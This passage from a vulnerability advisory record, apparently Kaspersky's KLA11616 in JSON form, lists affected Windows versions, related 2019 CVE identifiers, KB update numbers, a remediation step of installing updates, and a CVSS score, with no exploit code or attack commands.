2016 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 1803 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 2004 for x64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2019-1483](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1483>) \n[CVE-2019-1484](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1484>) \n[CVE-2019-1489](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1489>) \n[CVE-2019-1488](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1488>) \n[CVE-2019-1453](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1453>) \n[CVE-2019-1465](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1465>) \n[CVE-2019-1458](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1458>) \n[CVE-2019-1474](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1474>) \n[CVE-2019-1476](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1476>) \n[CVE-2019-1471](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1471>) \n[CVE-2019-1467](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1467>) \n[CVE-2019-1468](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1468>) \n[CVE-2019-1469](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1469>) \n[CVE-2019-1466](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2019-1466>) \n[CVE-2019-1470](<https://nvd.nist.gov/vuln/detail/CVE-2019-1470>) \n[CVE-2019-1472](<https://nvd.nist.gov/vuln/detail/CVE-2019-1472>) \n[CVE-2019-1477](<https://nvd.nist.gov/vuln/detail/CVE-2019-1477>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2019-1483](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1483>)0.0Unknown \n[CVE-2019-1484](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1484>)0.0Unknown \n[CVE-2019-1489](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1489>)0.0Unknown \n[CVE-2019-1488](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1488>)0.0Unknown \n[CVE-2019-1470](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1470>)0.0Unknown \n[CVE-2019-1453](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1453>)0.0Unknown \n[CVE-2019-1465](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1465>)0.0Unknown \n[CVE-2019-1458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1458>)0.0Unknown \n[CVE-2019-1474](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1474>)0.0Unknown \n[CVE-2019-1472](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1472>)0.0Unknown \n[CVE-2019-1476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1476>)0.0Unknown \n[CVE-2019-1471](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1471>)0.0Unknown \n[CVE-2019-1467](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1467>)0.0Unknown \n[CVE-2019-1468](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1468>)0.0Unknown \n[CVE-2019-1477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1477>)0.0Unknown \n[CVE-2019-1469](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1469>)0.0Unknown \n[CVE-2019-1466](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1466>)0.0Unknown\n\n### *KB list*:\n[4530684](<http://support.microsoft.com/kb/4530684>) \n[4530691](<http://support.microsoft.com/kb/4530691>) \n[4530681](<http://support.microsoft.com/kb/4530681>) \n[4530714](<http://support.microsoft.com/kb/4530714>) \n[4530689](<http://support.microsoft.com/kb/4530689>) \n[4530730](<http://support.microsoft.com/kb/4530730>) \n[4530717](<http://support.microsoft.com/kb/4530717>) \n[4530698](<http://support.microsoft.com/kb/4530698>) \n[4530702](<http://support.microsoft.com/kb/4530702>) \n[4530715](<http://support.microsoft.com/kb/4530715>) \n[4565503](<http://support.microsoft.com/kb/4565503>)\n\n### *Microsoft official advisories*:", "edition": 1, "modified": "2020-07-22T00:00:00", "published": "2019-12-11T00:00:00", "id": "KLA11616", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11616", "title": "\r KLA11616Multiple vulnerabilities in Microsoft Windows ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}